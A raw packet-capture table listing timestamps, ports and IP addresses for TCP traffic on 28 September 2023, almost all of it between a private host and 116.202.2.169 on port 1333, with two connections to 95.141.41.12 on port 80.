Sep 28, 2023 06:02:00.270730019 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.270737886 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.270785093 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.270797014 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.270840883 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.270869017 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.270895004 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.270910025 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.270935059 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.270948887 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.270991087 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.271078110 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.271116972 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.271183968 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.271223068 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.271235943 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.271272898 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.271276951 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.271315098 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.271332979 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.271373987 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.271401882 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.271442890 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.271512985 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.271545887 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.271552086 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.271584988 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.271612883 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.271639109 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.271651983 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.271678925 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.271703959 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.271744013 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.271758080 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.271797895 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.271810055 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.271847963 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.271867037 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.271892071 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.271904945 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.271931887 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.271958113 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.271997929 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.272013903 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.272051096 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.272063017 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.272103071 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.272111893 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.272150993 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.272176981 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.272202969 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.272216082 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.272243023 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.272342920 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.272377968 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.272382021 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.272419930 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.272434950 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.272474051 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.272514105 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.272563934 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.272592068 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.272630930 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.272650003 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.272686958 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.272711039 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.272747993 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.356694937 CEST	49816	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:00.357148886 CEST	49817	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:00.429040909 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.429101944 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.429126024 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.429200888 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.429506063 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.429574013 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.429603100 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.429655075 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.429676056 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.429716110 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.429725885 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.429764986 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.429788113 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.429840088 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.429858923 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.429908037 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.429930925 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.429970026 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.429985046 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.430023909 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.430069923 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.430121899 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.430141926 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.430191040 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.430212021 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.430280924 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.430325031 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.430325031 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.430422068 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.430480957 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.430484056 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.430521965 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.430536032 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.430572033 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.430592060 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.430639982 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.430695057 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.430747986 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.430764914 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.430816889 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.430834055 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.430881023 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.430937052 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.430989027 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.430993080 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.431034088 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.431066990 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.431103945 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.431113958 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.431143999 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.431169033 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.431214094 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.431231022 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.431277037 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.431303978 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.431349993 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.431458950 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.431479931 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.431571007 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.431617022 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.431617022 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.431617022 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.431660891 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.431710005 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.431718111 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.431756973 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.431787968 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.431848049 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.431852102 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.431930065 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.431937933 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.431974888 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.431977987 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.432027102 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.432046890 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.432097912 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.432137012 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.432185888 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.432198048 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.432251930 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.432287931 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.432337046 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.432421923 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.432467937 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.432542086 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.432559967 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.432590008 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.432621956 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.432790995 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.432841063 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.432914972 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.432960987 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.432961941 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.432979107 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.432998896 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.433006048 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.433033943 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.433033943 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.433046103 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.433090925 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.433115959 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.433135986 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.433170080 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.433170080 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.433198929 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.433218002 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.433237076 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.433243036 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.433257103 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.433265924 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.433276892 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.433285952 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.433305025 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.433315992 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.433320999 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.433350086 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.433357954 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.433396101 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.433398008 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.433444023 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.433445930 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.433479071 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.433491945 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.433528900 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.433553934 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.433573008 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.433589935 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.433598995 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.433628082 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.433628082 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.433667898 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.433712959 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.433765888 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.433814049 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.433851004 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.433896065 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.433932066 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.433965921 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.433975935 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.434007883 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.434012890 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.434056044 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.434092045 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.434143066 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.434175014 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.434222937 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.434238911 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.434294939 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.434328079 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.434361935 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.434372902 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.434402943 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.434447050 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.434467077 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.434497118 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.434528112 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.434540033 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.434575081 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.434586048 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.434617043 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.434643984 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.434689999 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.434726954 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.434772015 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.434779882 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.434817076 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.434828997 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.434854984 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.434861898 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.434906006 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.434909105 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.434953928 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.434990883 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.435023069 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.435035944 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.435066938 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.435089111 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.435134888 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.435153961 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.435208082 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.435218096 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.435252905 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.435262918 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.435292959 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.435314894 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.435332060 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.435357094 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.435365915 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.435379028 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.435410023 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.435415983 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.435461044 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.435498953 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.435544014 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.435559988 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.435606003 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.435642958 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.435688019 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.435700893 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.435749054 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.435758114 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.435791969 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.435801983 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.435832977 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.435838938 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.435883999 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.435916901 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.435962915 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.442550898 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.442775011 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.442794085 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.442812920 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.442830086 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.442847013 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.442848921 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.442866087 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.442878962 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.442878962 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.442899942 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.442914963 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.442917109 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.442960978 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.442970991 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.443006039 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.443059921 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.443113089 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.443141937 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.443171024 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.443255901 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.443274975 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.443275928 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.443275928 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.443275928 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.443310976 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.443340063 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.443355083 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.443355083 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.443380117 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.443392992 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.443448067 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.443448067 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.443499088 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.443505049 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.443533897 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.443556070 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.443577051 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.443634987 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.443664074 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.443689108 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.443691969 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.443707943 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.443747997 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.443769932 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.443820953 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.443846941 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.443875074 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.443897009 CEST	49810	1333	192.168.2.3	116.202.2.169
